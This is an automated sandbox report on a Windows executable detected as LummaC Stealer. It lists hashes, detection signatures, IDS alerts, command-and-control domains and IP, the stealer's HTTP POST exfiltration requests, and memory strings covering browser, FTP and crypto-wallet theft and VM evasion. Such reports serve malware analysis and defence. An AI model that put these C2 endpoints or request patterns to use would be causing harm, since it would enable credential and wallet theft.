Edit tour

Windows Analysis Report
4JPKDcwtDo.exe

Overview

General Information

Sample name:4JPKDcwtDo.exe
renamed because original name is a hash value
Original sample name:5530e06db7d6818359bef99c53ebef57.exe
Analysis ID:1599847
MD5:5530e06db7d6818359bef99c53ebef57
SHA1:d43255e222c09a14f7e2cc205df120af573a15d2
SHA256:d878e20cbf86109866c7fbd2ab840f58eb0927c526feed708b50d97c5bb9eff8
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Found many strings related to Crypto-Wallets (likely being stolen)
Joe Sandbox ML detected suspicious sample
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • 4JPKDcwtDo.exe (PID: 7120 cmdline: "C:\Users\user\Desktop\4JPKDcwtDo.exe" MD5: 5530E06DB7D6818359BEF99C53EBEF57)
    • WerFault.exe (PID: 7656 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7120 -s 616 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000004.00000003.1352139150.000000000074C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000004.00000002.1650950894.0000000000678000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x1718:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        00000004.00000002.1651366354.0000000002100000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        00000004.00000003.1352545477.0000000000750000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: 4JPKDcwtDo.exe PID: 7120JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Click to see the 2 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-26T15:47:59.794618+010020283713Unknown Traffic192.168.2.749700172.67.149.66443TCP
            2025-01-26T15:48:01.349618+010020283713Unknown Traffic192.168.2.749701172.67.149.66443TCP
            2025-01-26T15:48:02.600271+010020283713Unknown Traffic192.168.2.749702172.67.149.66443TCP
            2025-01-26T15:48:03.829022+010020283713Unknown Traffic192.168.2.749703172.67.149.66443TCP
            2025-01-26T15:48:05.459225+010020283713Unknown Traffic192.168.2.749705172.67.149.66443TCP
            2025-01-26T15:48:06.974006+010020283713Unknown Traffic192.168.2.749711172.67.149.66443TCP
            2025-01-26T15:48:08.667496+010020283713Unknown Traffic192.168.2.749722172.67.149.66443TCP
            2025-01-26T15:48:11.847642+010020283713Unknown Traffic192.168.2.749746172.67.149.66443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-26T15:48:00.859158+010020546531A Network Trojan was detected192.168.2.749700172.67.149.66443TCP
            2025-01-26T15:48:01.865980+010020546531A Network Trojan was detected192.168.2.749701172.67.149.66443TCP
            2025-01-26T15:48:12.337047+010020546531A Network Trojan was detected192.168.2.749746172.67.149.66443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-26T15:48:00.859158+010020498361A Network Trojan was detected192.168.2.749700172.67.149.66443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-26T15:48:01.865980+010020498121A Network Trojan was detected192.168.2.749701172.67.149.66443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-26T15:47:59.794618+010020594241Domain Observed Used for C2 Detected192.168.2.749700172.67.149.66443TCP
            2025-01-26T15:48:01.349618+010020594241Domain Observed Used for C2 Detected192.168.2.749701172.67.149.66443TCP
            2025-01-26T15:48:02.600271+010020594241Domain Observed Used for C2 Detected192.168.2.749702172.67.149.66443TCP
            2025-01-26T15:48:03.829022+010020594241Domain Observed Used for C2 Detected192.168.2.749703172.67.149.66443TCP
            2025-01-26T15:48:05.459225+010020594241Domain Observed Used for C2 Detected192.168.2.749705172.67.149.66443TCP
            2025-01-26T15:48:06.974006+010020594241Domain Observed Used for C2 Detected192.168.2.749711172.67.149.66443TCP
            2025-01-26T15:48:08.667496+010020594241Domain Observed Used for C2 Detected192.168.2.749722172.67.149.66443TCP
            2025-01-26T15:48:11.847642+010020594241Domain Observed Used for C2 Detected192.168.2.749746172.67.149.66443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-26T15:47:59.155701+010020594211Domain Observed Used for C2 Detected192.168.2.7530911.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-26T15:47:59.169214+010020594231Domain Observed Used for C2 Detected192.168.2.7589041.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-26T15:48:03.207759+010020480941Malware Command and Control Activity Detected192.168.2.749702172.67.149.66443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://toppyneedus.biz/apipAvira URL Cloud: Label: malware
            Source: https://toppyneedus.biz/_Avira URL Cloud: Label: malware
            Source: https://toppyneedus.biz/api$Avira URL Cloud: Label: malware
            Source: https://toppyneedus.biz/riqAvira URL Cloud: Label: malware
            Source: https://toppyneedus.biz/9Avira URL Cloud: Label: malware
            Source: https://toppyneedus.biz/hAvira URL Cloud: Label: malware
            Source: 4JPKDcwtDo.exeReversingLabs: Detection: 60%
            Source: 4JPKDcwtDo.exeVirustotal: Detection: 56%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
            Source: 4JPKDcwtDo.exeJoe Sandbox ML: detected

            Compliance

            barindex
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeUnpacked PE file: 4.2.4JPKDcwtDo.exe.400000.0.unpack
            Source: 4JPKDcwtDo.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: unknownHTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49700 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49701 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49702 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49703 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49722 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49746 version: TLS 1.2

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2059421 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impolitewearr .biz) : 192.168.2.7:53091 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2059423 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz) : 192.168.2.7:58904 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49700 -> 172.67.149.66:443
            Source: Network trafficSuricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49702 -> 172.67.149.66:443
            Source: Network trafficSuricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49722 -> 172.67.149.66:443
            Source: Network trafficSuricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49703 -> 172.67.149.66:443
            Source: Network trafficSuricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49746 -> 172.67.149.66:443
            Source: Network trafficSuricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49705 -> 172.67.149.66:443
            Source: Network trafficSuricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49701 -> 172.67.149.66:443
            Source: Network trafficSuricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49711 -> 172.67.149.66:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49700 -> 172.67.149.66:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 172.67.149.66:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49702 -> 172.67.149.66:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49746 -> 172.67.149.66:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49701 -> 172.67.149.66:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49701 -> 172.67.149.66:443
            Source: Joe Sandbox ViewIP Address: 172.67.149.66 172.67.149.66
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 172.67.149.66:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49702 -> 172.67.149.66:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49722 -> 172.67.149.66:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 172.67.149.66:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 172.67.149.66:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49705 -> 172.67.149.66:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49711 -> 172.67.149.66:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49746 -> 172.67.149.66:443
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: toppyneedus.biz
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: toppyneedus.biz
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8WECHI4R4Q2XCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12809Host: toppyneedus.biz
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3W3GH7I4IB9Z3GWPKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15065Host: toppyneedus.biz
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=00T4M7OEH02User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20354Host: toppyneedus.biz
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5T15HD77S8TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2595Host: toppyneedus.biz
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GKFMC2XGCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 557249Host: toppyneedus.biz
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: toppyneedus.biz
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: financialfreez.click
            Source: global trafficDNS traffic detected: DNS query: impolitewearr.biz
            Source: global trafficDNS traffic detected: DNS query: toppyneedus.biz
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: toppyneedus.biz
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1352162990.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1363898461.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1401075229.0000000000745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: Amcache.hve.11.drString found in binary or memory: http://upx.sf.net
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349354663.0000000002CFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1352738637.000000000074B000.00000004.00000020.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349443041.0000000002CF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349354663.0000000002CFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1352738637.000000000074B000.00000004.00000020.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349443041.0000000002CF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349443041.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349354663.0000000002CFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1337357442.0000000002F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1337357442.0000000002F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: 4JPKDcwtDo.exe, 00000004.00000002.1651799702.0000000002CD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://toppyneedus.biz/
            Source: 4JPKDcwtDo.exe, 00000004.00000002.1651799702.0000000002CD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://toppyneedus.biz/9
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1352355984.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349443041.0000000002CF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://toppyneedus.biz/_
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1401175680.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toppyneedus.biz/api
            Source: 4JPKDcwtDo.exe, 00000004.00000002.1650981832.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toppyneedus.biz/api$
            Source: 4JPKDcwtDo.exe, 00000004.00000002.1650981832.00000000006CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toppyneedus.biz/apip
            Source: 4JPKDcwtDo.exe, 00000004.00000002.1650981832.00000000006F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toppyneedus.biz/h
            Source: 4JPKDcwtDo.exe, 00000004.00000002.1651799702.0000000002CD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://toppyneedus.biz/pi
            Source: 4JPKDcwtDo.exe, 00000004.00000002.1651799702.0000000002CD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://toppyneedus.biz/riq
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1320515584.0000000002CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://toppyneedus.biz:443/api
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1352738637.000000000074B000.00000004.00000020.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349443041.0000000002CF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1352738637.000000000074B000.00000004.00000020.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349443041.0000000002CF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarke
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1337357442.0000000002F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1337357442.0000000002F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1337357442.0000000002F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1337357442.0000000002F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1337357442.0000000002F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
            Source: unknownHTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.7:49700 version: TLS 1.2
